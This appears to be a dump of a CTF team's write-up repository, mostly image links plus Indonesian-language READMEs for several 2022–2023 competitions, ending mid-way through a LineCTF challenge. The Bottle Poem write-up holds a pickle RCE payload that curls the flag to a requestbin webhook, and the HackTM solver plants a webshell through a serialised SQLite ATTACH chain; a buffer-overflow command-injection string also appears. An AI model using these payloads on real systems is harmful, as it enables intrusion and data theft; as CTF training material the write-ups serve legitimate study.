https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192926.png
--------------------------------------------------------------------------------
/2022/kitctfctf-2022/Pasted image 20221211192941.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192941.png
--------------------------------------------------------------------------------
/2022/kitctfctf-2022/Pasted image 20221211192953.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211192953.png
--------------------------------------------------------------------------------
/2022/kitctfctf-2022/Pasted image 20221211193146.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211193146.png
--------------------------------------------------------------------------------
/2022/kitctfctf-2022/Pasted image 20221211193234.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/kitctfctf-2022/Pasted image 20221211193234.png
--------------------------------------------------------------------------------
/2022/sekai-ctf/Pasted image 20221004173301.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/sekai-ctf/Pasted image 20221004173301.png
--------------------------------------------------------------------------------
/2022/sekai-ctf/Pasted image 20221004173340.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/sekai-ctf/Pasted image 20221004173340.png
--------------------------------------------------------------------------------
/2022/sekai-ctf/README.md:
--------------------------------------------------------------------------------
1 | # Bottle Poem
2 | vulnerability: LFI plus python bottle library with pickle deserialization RCE
3 |
4 | Pertama kita perlu mengetahui letak dari program-nya
5 |
6 | ```http
7 | GET /show?id=/proc/thread-self/cmdline HTTP/1.1
8 | ```
9 |
10 | setelah itu saya coba untuk meng-lfi semua file yang ada disana, antaralain
11 |
12 | - ./config/secret.py: disini saya menemukan key untuk encode cookie "name"
13 | - ./app.py: ini merupakan aplikasi utama-nya
14 | - ./views/\
15 |
16 | Saya mencoba untuk mereplikasi program tersebut menggunakan file-file yang sudah saya temukan tadi, dan menjalankannya di localhost.
17 | Setelah sekian lama melihat source code dari app.py, disini saya curiga, bahwa vulnerabilitynya bukan berada di app.py tersebut, namun berada di library bottle.
18 |
19 | Saat melihat source code bottle.py kita bisa melihat fungsi
20 | ```python
21 | def get_cookie(self, key, default=None, secret=None):
22 | """ Return the content of a cookie. To read a `Signed Cookie`, the
23 | `secret` must match the one used to create the cookie (see
24 | :meth:`BaseResponse.set_cookie`). If anything goes wrong (missing
25 | cookie or wrong signature), return a default value. """
26 | value = self.cookies.get(key)
27 | if secret and value:
28 | dec = cookie_decode(value, secret) # (key, value) tuple or None
29 | return dec[1] if dec and dec[0] == key else default
30 | return value or default
31 | ```
32 | dan
33 | ```python
34 | def cookie_decode(data, key):
35 | ''' Verify and decode an encoded string. Return an object or None.'''
36 | data = tob(data)
37 | if cookie_is_encoded(data):
38 | sig, msg = data.split(tob('?'), 1)
39 | if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())):
40 | return pickle.loads(base64.b64decode(msg))
41 | return None
42 | ```
43 |
44 | mata saya langsung tertuju di library pickle yang merupakan module serialization dan deserialization di python. saya coba cari di google dan mendapatkan ini: [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/ "https://davidhamann.de/2020/04/05/exploiting-python-pickle/")
45 |
46 | ## exploitasi
47 | saya sedikit mengubah source code dari app.py dengan menyelipkan payload pickle rce
48 |
49 | ```python
50 | ...snip..
51 | @route("/sign")
52 | def index():
53 | try:
54 | COMMAND = """curl -X POST -d "fizz=`/flag`" https://requestbin.io/19b9tzf1"""
55 | class PickleRce(object):
56 | def __reduce__(self):
57 | import os
58 | return (os.system,(COMMAND,))
59 | session = request.get_cookie("name", secret=sekai)
60 | if not session or session["name"] == "guest":
61 | session = {"name": PickleRce()}
62 | response.set_cookie("name", session, secret=sekai)
63 | return template("guest", name=session["name"])
64 | if session["name"] == "admin":
65 | return template("admin", name=session["name"])
66 | except:
67 | return "pls no hax"
68 | ...snip...
69 | ```
70 |
71 | jalankan di localhost, masuk ke "localhost:\/sign" lalu copy paste
72 |
73 | 
74 |
75 | masukkan ke cookie tersebut di "http://bottle-poem.ctf.sekai.team/sign"
76 |
77 | dan boom, kita mendapatkan flagnya dari webhook kita
78 |
79 | 
--------------------------------------------------------------------------------
/2022/square-ctf-2022/Pasted image 20221121074934.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/square-ctf-2022/Pasted image 20221121074934.png
--------------------------------------------------------------------------------
/2022/square-ctf-2022/Pasted image 20221121074939.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/square-ctf-2022/Pasted image 20221121074939.png
--------------------------------------------------------------------------------
/2022/square-ctf-2022/Pasted image 20221121075018.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/square-ctf-2022/Pasted image 20221121075018.png
--------------------------------------------------------------------------------
/2022/square-ctf-2022/Pasted image 20221121075102.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/square-ctf-2022/Pasted image 20221121075102.png
--------------------------------------------------------------------------------
/2022/square-ctf-2022/README.md:
--------------------------------------------------------------------------------
1 | # pwn
2 | ## ez-pwn-1
3 | ### tldr;
4 | dikasih source code
5 | ```c
6 | #include
7 | #include
8 | #include
9 | #include
10 |
11 |
12 | int main()
13 | {
14 | char command[16];
15 | char way_too_small_input_buf[8];
16 | strcpy(command, "ls");
17 |
18 | puts("Hi! would you like me to ls the current directory?");
19 | read(0, way_too_small_input_buf, 24);
20 | if (!strcmp(way_too_small_input_buf, "no\n")) {
21 | puts("Oh, ok :(");
22 | exit(0);
23 | }
24 |
25 | puts("Ok, here ya go!\n");
26 | system(command);
27 |
28 | }
29 | ```
30 |
31 | tinggal bof biasa payload: aaaabaaacd th*;ls;cat f*
32 |
33 | flag: flag{congrats_youve_exploited_a_memory_corruption_vulnerability}
34 |
35 | # web
36 | ## xark
37 | Pada challenge in kita diberikan source code berupa js program.
38 | ```js
39 | ...snip...
40 | const app = express();
41 | const port = 3001;
42 | const knex = require('knex')(config.get('knex'));
43 | ...snip...
44 | ```
45 |
46 | program ini menggunakan knex sebagai module untuk mengurus query mysql program ini.
47 | https://github.com/knex/knex/issues/1227
48 |
49 | 
50 |
51 | TL;DR knex mempunyai sebuah vulnerability lama, dimana kita bisa merubah query dari program knex menggunakan application/json post requests. Jadi semisal kita membuat query seperti dibawah ini:
52 |
53 | ```json
54 | {"to": {"message":"the flag is here!"}}
55 | ```
56 |
57 | maka akan menjadi
58 |
59 | 
60 |
61 | #### exploitation
62 | Jadi untuk mendapatkan flag yang terdapat di query di bawah ini:
63 |
64 | ```js
65 | ...snip...
66 | knex('crushes').insert({
67 | from: config.init.flag,
68 | to: config.init.flag,
69 | message: 'This is the flag!',
70 | }).then();
71 | }
72 | });
73 | ...snip...
74 | ```
75 |
76 | kita bisa melakukan post request application/json di endpoint POST /data HTTP/1.1
77 |
78 | 
79 |
80 |
--------------------------------------------------------------------------------
/2022/tangerang CTF/Pasted image 20220319104150.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319104150.png
--------------------------------------------------------------------------------
/2022/tangerang CTF/Pasted image 20220319174935.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319174935.png
--------------------------------------------------------------------------------
/2022/tangerang CTF/Pasted image 20220319174951.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319174951.png
--------------------------------------------------------------------------------
/2022/tangerang CTF/Pasted image 20220319180942.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319180942.png
--------------------------------------------------------------------------------
/2022/tangerang CTF/Pasted image 20220319194044.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319194044.png
--------------------------------------------------------------------------------
/2022/tangerang CTF/Pasted image 20220319194544.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220319194544.png
--------------------------------------------------------------------------------
/2022/tangerang CTF/Pasted image 20220320063212.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220320063212.png
--------------------------------------------------------------------------------
/2022/tangerang CTF/Pasted image 20220320065410.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220320065410.png
--------------------------------------------------------------------------------
/2022/tangerang CTF/Pasted image 20220320102408.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220320102408.png
--------------------------------------------------------------------------------
/2022/tangerang CTF/Pasted image 20220320103533.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/tangerang CTF/Pasted image 20220320103533.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221222205054.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205054.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221222205402.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205402.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221222205507.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205507.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221222205718.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205718.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221222205819.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205819.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221222205926.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222205926.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221222210046.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210046.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221222210140.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210140.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221222210201.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210201.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221222210316.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210316.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221222210324.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221222210324.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221223211635.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223211635.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221223211710.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223211710.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221223211742.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223211742.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221223211801.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223211801.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221223212147.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223212147.png
--------------------------------------------------------------------------------
/2022/x-mas-ctf-2022/Pasted image 20221223212155.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2022/x-mas-ctf-2022/Pasted image 20221223212155.png
--------------------------------------------------------------------------------
/2023/ByuCtf-2023/README.md:
--------------------------------------------------------------------------------
1 | ---
2 | archive: https://drive.google.com/drive/folders/12dwK2ehCbXgppxWXFanpri4Msy4N177Y?usp=share_link
3 | official_writeup: https://github.com/BYU-CSA/BYUCTF-2023/tree/main
4 | ---
5 |
6 | # chain
7 |
8 | ```python
9 | from pwn import *
10 |
11 | key = p64(0xe59f1024e59f0024).hex()
12 | key += p64(0xe1a01fa3e0413000).hex()
13 | key += p64(0xe1b010c1e0811143).hex()
14 | key += p64(0xe59f3010012fff1e).hex()
15 | key += p64(0x012fff1ee3530000).hex()
16 | key += p64(0x000210f8e12fff13).hex()
17 |
18 | key_list = [int(key[i:i+2],16) for i in range(0, len(key), 2)]
19 |
20 | array = [0xc2,0x9c,0x65,0x83,0x95,0x66,0xfa,0x15,0x5e,0x58,0x2f,0x23,0xac,0x4f,0xa1,0x4c,0x7d,0x1e,0x69,0x80,0x8c,0x4a,0x26,0x5b,0x5f,0x91,0x30,0xcf,0xc0,0x4d,0x97,0x9b,0xba,0x20,0x77,0x4c,0xf5,0xef,0x97,0x96,0x31,0x30,0x8c,0xe2]
21 |
22 | idx = [0x0e,0x03,0x1c,0x13,0x17,0x21,0x12,0x04,0x27,0x09,0x0d,0x22,0x1e,0x15,0x0b,0x24,0x1d,0x0a,0x18,0x2b,0x19,0x00,0x1b,0x2a,0x08,0x1f,0x20,0x25,0x02,0x1a,0x0c,0x29,0x07,0x05,0x11,0x28,0x14,0x16,0x23,0x0f,0x01,0x10,0x2c,0x06,0x26]
23 |
24 | print(len(array))
25 | print(len(idx))
26 | print(key_list)
27 | print(len(key_list))
28 |
29 | for i in range(44):
30 | p = key_list[idx[i]]
31 | c = array[i]
32 | print(chr(p^c), end='')
33 | print()
34 | ```
35 |
36 | ## Our Team Members Writeup
37 |
38 | - https://github.com/daffainfo/ctf-writeup/tree/main/BYUCTF%202023
39 | ```
40 | Crypto Compact
41 | Crypto RSA1
42 | Crypto RSA2
43 | Crypto RSA3
44 | Crypto RSA4
45 | Crypto RSA5
46 | OSINT Legoclones 1
47 | OSINT Legoclones 2
48 | ```
--------------------------------------------------------------------------------
/2023/Cursedctf-2023/README.md:
--------------------------------------------------------------------------------
1 | ## Chall Archive:
2 | [https://drive.google.com/drive/folders/1MjkHTBFcUh94nb4SCxRDIDSNrB9P3kdv?usp=sharing](https://drive.google.com/drive/folders/1MjkHTBFcUh94nb4SCxRDIDSNrB9P3kdv?usp=sharing "https://drive.google.com/drive/folders/1MjkHTBFcUh94nb4SCxRDIDSNrB9P3kdv?usp=sharing")
3 |
4 | ## Ourteam Writeup
5 | @daffainfo
6 |
7 | [https://github.com/daffainfo/ctf-writeup/tree/main/cursedCTF%202023](https://github.com/daffainfo/ctf-writeup/tree/main/cursedCTF%202023 "https://github.com/daffainfo/ctf-writeup/tree/main/cursedCTF%202023")
8 |
9 |
10 |
--------------------------------------------------------------------------------
/2023/DiceCTF-2023/Pasted image 20230207164229.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/DiceCTF-2023/Pasted image 20230207164229.png
--------------------------------------------------------------------------------
/2023/DiceCTF-2023/Pasted image 20230207164413.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/DiceCTF-2023/Pasted image 20230207164413.png
--------------------------------------------------------------------------------
/2023/DiceCTF-2023/Pasted image 20230207164435.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/DiceCTF-2023/Pasted image 20230207164435.png
--------------------------------------------------------------------------------
/2023/HTB Cyber Apocalypse 2023/Pasted image 20230324115213.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/HTB Cyber Apocalypse 2023/Pasted image 20230324115213.png
--------------------------------------------------------------------------------
/2023/HackTMCTF-quals/README.md:
--------------------------------------------------------------------------------
1 | # Crypto - d-phi-enc
2 |
3 | Franklin Reiter's attack on related messages.
4 |
5 | source: https://github.com/ashutosh1206/Crypton/blob/master/RSA-encryption/Attack-Franklin-Reiter/README.md
6 |
7 | Ketika 2 pesan berbeda dienkripsi dengan nilai e dan modulus N yang sama, akan tetapi pesan tersebut saling berkaitan, misalnya:
8 |
9 | ```
10 | c1 = m^e % N
11 | c2 = (m+constant)^e % N
12 | ```
13 |
14 | Pada soal ini diketahui masing-masing persamaan berikut
15 |
16 | ```
17 | enc_d = ((1-k*phi)/e)^3 % N
18 | enc_phi = (phi)^3 % N
19 | ```
20 |
21 | Berdasarkan uji coba yang saya lakukan ketika mencari nilai d dengan e=3, didapatkan nilai k yang relatif kecil yaitu antara 1 sampai 3, tapi kebanyakan yang saya temui adalah 2, oleh karena itu saya coba dengan nilai k=2, berikut script yang digunakan:
22 |
23 | from: https://github.com/ashutosh1206/Crypton/blob/master/RSA-encryption/Attack-Franklin-Reiter/exploit.sage
24 |
25 | ```python
26 | def GCD(a, b):
27 | while b:
28 | a,b = b, a % b
29 | a.monic()
30 | def franklinreiter(C1, C2, e, N):
31 | P. = PolynomialRing(Zmod(N))
32 | f1 = ((1+2*phi)//e)^e - C1
33 | f2 = phi^e - C2
34 | return -GCD(f1, f2).coefficients()[0]
35 | phi = franklinreiter(enc_d, enc_phi, 3, n)
36 | d = pow(3, -1, phi)
37 | flag = hex(pow(enc_flag, d, N))[2:]
38 | print(bytes.fromhex(flag)) #b"HackTM{Have you warmed up? If not, I suggest you consider the case where e=65537, although I don't know if it's solvable. Why did I say that? Because I have to make this flag much longer to avoid solving it just by calculating the cubic root of enc_flag.}"
39 | ```
40 |
41 | Write up crypto dari probset [https://github.com/y011d4/my-ctf-challenges/tree/main/2023-HackTMCTF-2023/crypto](https://github.com/y011d4/my-ctf-challenges/tree/main/2023-HackTMCTF-2023/crypto "https://github.com/y011d4/my-ctf-challenges/tree/main/2023-HackTMCTF-2023/crypto")
42 |
43 | # WEB - Blog revenge
44 |
45 | Blog revenge solver
46 |
47 | ```php
48 | queries = array(
93 | new Query("ATTACH DATABASE '/var/www/html/images/$webshell' AS jctf;", array()),
94 | new Query("CREATE TABLE jctf.pwn (dataz text);", array()),
95 | new Query('INSERT INTO jctf.pwn (dataz) VALUES ("");', array())
96 | );
97 |
98 | $username = "a";
99 | $myobj = new User($username);
100 | $myobj->profile = new Query("", "");
101 | $myobj->profile->query_string = new User("");
102 | $myobj->profile->query_string->profile = $conn;
103 |
104 |
105 | $payload = base64_encode(serialize($myobj));
106 | register($username);
107 |
108 | $response = request($payload);
109 | // echo $response;
110 |
111 | shell($webshell);
112 | ```
113 |
114 |
115 | ## External writeup
116 |
117 | [https://github.com/daffainfo/ctf-writeup/tree/main/HackTM%202023](https://github.com/daffainfo/ctf-writeup/tree/main/HackTM%202023 "https://github.com/daffainfo/ctf-writeup/tree/main/HackTM%202023")
118 |
119 | - web/Blog
120 |
121 | By: daffainfo
122 |
--------------------------------------------------------------------------------
/2023/IdekCTF-2022/Pasted image 20230116231049.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/IdekCTF-2022/Pasted image 20230116231049.png
--------------------------------------------------------------------------------
/2023/IdekCTF-2022/Pasted image 20230116231114.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/IdekCTF-2022/Pasted image 20230116231114.png
--------------------------------------------------------------------------------
/2023/IdekCTF-2022/Pasted image 20230116231338.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/IdekCTF-2022/Pasted image 20230116231338.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064030.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064030.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064152.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064152.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064305.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064305.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064318.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064318.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064420.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064420.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064435.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064435.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064452.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064452.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064534.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064534.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064618.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064618.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064721.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064721.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064755.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064755.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064820.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064820.png
--------------------------------------------------------------------------------
/2023/Knightctf-2023/Pasted image 20230122064919.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/Knightctf-2023/Pasted image 20230122064919.png
--------------------------------------------------------------------------------
/2023/LACTF-2023/Pasted image 20230214115929.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/LACTF-2023/Pasted image 20230214115929.png
--------------------------------------------------------------------------------
/2023/LineCTF 2023/README.md:
--------------------------------------------------------------------------------
1 | # Old Pal - web
2 | ## Description
3 | How about an Old Pal for your aperitif?
4 | http://104.198.120.186:11006/cgi-bin/main.pl?password=
5 |
6 | ## Exploit
7 | Pada challenge ini kita diberikan source code sebagai berikut.
8 |
9 | ```perl
10 | #!/usr/bin/perl
11 | use strict;
12 | use warnings;
13 |
14 | use CGI;
15 | use URI::Escape;
16 |
17 |
18 | $SIG{__WARN__} = \&warn;
19 | sub warn {
20 | print("Hacker? :(");
21 | exit(1);
22 | }
23 |
24 |
25 | my $q = CGI->new;
26 | print "Content-Type: text/html\n\n";
27 |
28 |
29 | my $pw = uri_unescape(scalar $q->param("password"));
30 | if ($pw eq '') {
31 | print "Hello :)";
32 | exit();
33 | }
34 | if (length($pw) >= 20) {
35 | print "Too long :(";
36 | die();
37 | }
38 | if ($pw =~ /[^0-9a-zA-Z_-]/) {
39 | print "Illegal character :(";
40 | die();
41 | }
42 | if ($pw !~ /[0-9]/ || $pw !~ /[a-zA-Z]/ || $pw !~ /[_-]/) {
43 | print "Weak password :(";
44 | die();
45 | }
46 | if ($pw =~ /[0-9_-][boxe]/i) {
47 | print "Do not punch me :(";
48 | die();
49 | }
